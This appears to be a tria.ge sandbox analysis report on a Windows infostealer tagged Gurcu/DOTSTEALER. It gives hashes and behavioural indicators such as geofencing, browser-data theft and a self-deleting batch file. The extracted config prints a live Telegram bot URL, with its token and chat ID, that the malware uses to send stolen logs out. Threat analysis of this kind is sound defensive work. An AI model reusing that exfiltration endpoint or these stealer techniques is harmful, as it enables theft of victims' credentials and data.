Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
96s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
08/12/2024, 08:13
Static task
static1
Behavioral task
behavioral1
Sample
55f67b598ae5d8956ea16deefdc771c7.exe
Resource
win7-20240903-en
General
-
Target
55f67b598ae5d8956ea16deefdc771c7.exe
-
Size
5.6MB
-
MD5
55f67b598ae5d8956ea16deefdc771c7
-
SHA1
2007aed44e368258d70bb124ad12e08a0e8ee1ae
-
SHA256
9dc28d9009e1d6a240030460e6c4e27e2014842cd3e7ab0349d31dd13b5fdfb8
-
SHA512
ad07651cab030fcd72169e6f64bf3a4dc3871c5f66f66607d9b056f4bdb9fe3916f0672833b8a289f5a7f6d642828f24e31e6520b5a7294a251661a5ff542b93
-
SSDEEP
98304:aGl27OuKr+gvhf2U9Nzm31PMoslkqXf0FvUcwti78OqJ7TPBvc8X6Uc:adOuK6mn9NzgMoYkSIvUcwti7TQlvciE
Malware Config
Extracted
gurcu
https://api.telegram.org/bot8081835502:AAFtGgtMdAzFeWYBpQcGx83fjDR_25zfjK0/sendDocument?chat_id=7538374929&caption=%F0%9F%92%A0DOTSTEALER%F0%9F%92%A0%0A%F0%9F%92%ABNew%20log:%0AIP:%20181.215.176.83%0AUsername:%20Admin%0ALocation:%20United%20Kingdom%20[GB],%20London,%20Englan
Signatures
-
Gurcu family
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation 55f67b598ae5d8956ea16deefdc771c7.exe -
Loads dropped DLL 1 IoCs
pid Process 3012 55f67b598ae5d8956ea16deefdc771c7.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 8 raw.githubusercontent.com 5 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 13 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 55f67b598ae5d8956ea16deefdc771c7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier 55f67b598ae5d8956ea16deefdc771c7.exe -
Suspicious behavior: EnumeratesProcesses 29 IoCs
pid Process 3012 55f67b598ae5d8956ea16deefdc771c7.exe 3012 55f67b598ae5d8956ea16deefdc771c7.exe 3012 55f67b598ae5d8956ea16deefdc771c7.exe 3012 55f67b598ae5d8956ea16deefdc771c7.exe 3012 55f67b598ae5d8956ea16deefdc771c7.exe 3012 55f67b598ae5d8956ea16deefdc771c7.exe 3012 55f67b598ae5d8956ea16deefdc771c7.exe 3012 55f67b598ae5d8956ea16deefdc771c7.exe 3012 55f67b598ae5d8956ea16deefdc771c7.exe 3012 55f67b598ae5d8956ea16deefdc771c7.exe 3012 55f67b598ae5d8956ea16deefdc771c7.exe 3012 55f67b598ae5d8956ea16deefdc771c7.exe 3012 55f67b598ae5d8956ea16deefdc771c7.exe 3012 55f67b598ae5d8956ea16deefdc771c7.exe 3012 55f67b598ae5d8956ea16deefdc771c7.exe 3012 55f67b598ae5d8956ea16deefdc771c7.exe 3012 55f67b598ae5d8956ea16deefdc771c7.exe 3012 55f67b598ae5d8956ea16deefdc771c7.exe 3012 55f67b598ae5d8956ea16deefdc771c7.exe 3012 55f67b598ae5d8956ea16deefdc771c7.exe 3012 55f67b598ae5d8956ea16deefdc771c7.exe 3012 55f67b598ae5d8956ea16deefdc771c7.exe 3012 55f67b598ae5d8956ea16deefdc771c7.exe 3012 55f67b598ae5d8956ea16deefdc771c7.exe 3012 55f67b598ae5d8956ea16deefdc771c7.exe 3012 55f67b598ae5d8956ea16deefdc771c7.exe 3012 55f67b598ae5d8956ea16deefdc771c7.exe 3012 55f67b598ae5d8956ea16deefdc771c7.exe 3012 55f67b598ae5d8956ea16deefdc771c7.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3012 55f67b598ae5d8956ea16deefdc771c7.exe -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 3012 wrote to memory of 4120 3012 55f67b598ae5d8956ea16deefdc771c7.exe 85 PID 3012 wrote to memory of 4120 3012 55f67b598ae5d8956ea16deefdc771c7.exe 85
Processes
-
C:\Users\Admin\AppData\Local\Temp\55f67b598ae5d8956ea16deefdc771c7.exe"C:\Users\Admin\AppData\Local\Temp\55f67b598ae5d8956ea16deefdc771c7.exe"1⤵
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3012 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpED3E.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpED3E.tmp.bat2⤵PID:4120
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.7MB
MD565ccd6ecb99899083d43f7c24eb8f869
SHA127037a9470cc5ed177c0b6688495f3a51996a023
SHA256aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4
SHA512533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d
-
Filesize
200B
MD52b5942934075d04697857aedbd257a22
SHA1a00557c4a5a31a37fa8a30ce06a1eac20fbb7516
SHA2563c8b82a821406d2223344c08712cca153f19157bb208293a4dd7f07c653c3598
SHA5126e1528aae8ef9e684f7aca7f938d49454e5d1f60ea863fc2a0403364e6e90fc48a4ac010a4794939098e77a28ca00aceb8de131944c06065d5b3ba85ce9e52b8
-
Filesize
116KB
MD5f70aa3fa04f0536280f872ad17973c3d
SHA150a7b889329a92de1b272d0ecf5fce87395d3123
SHA2568d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA51230675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84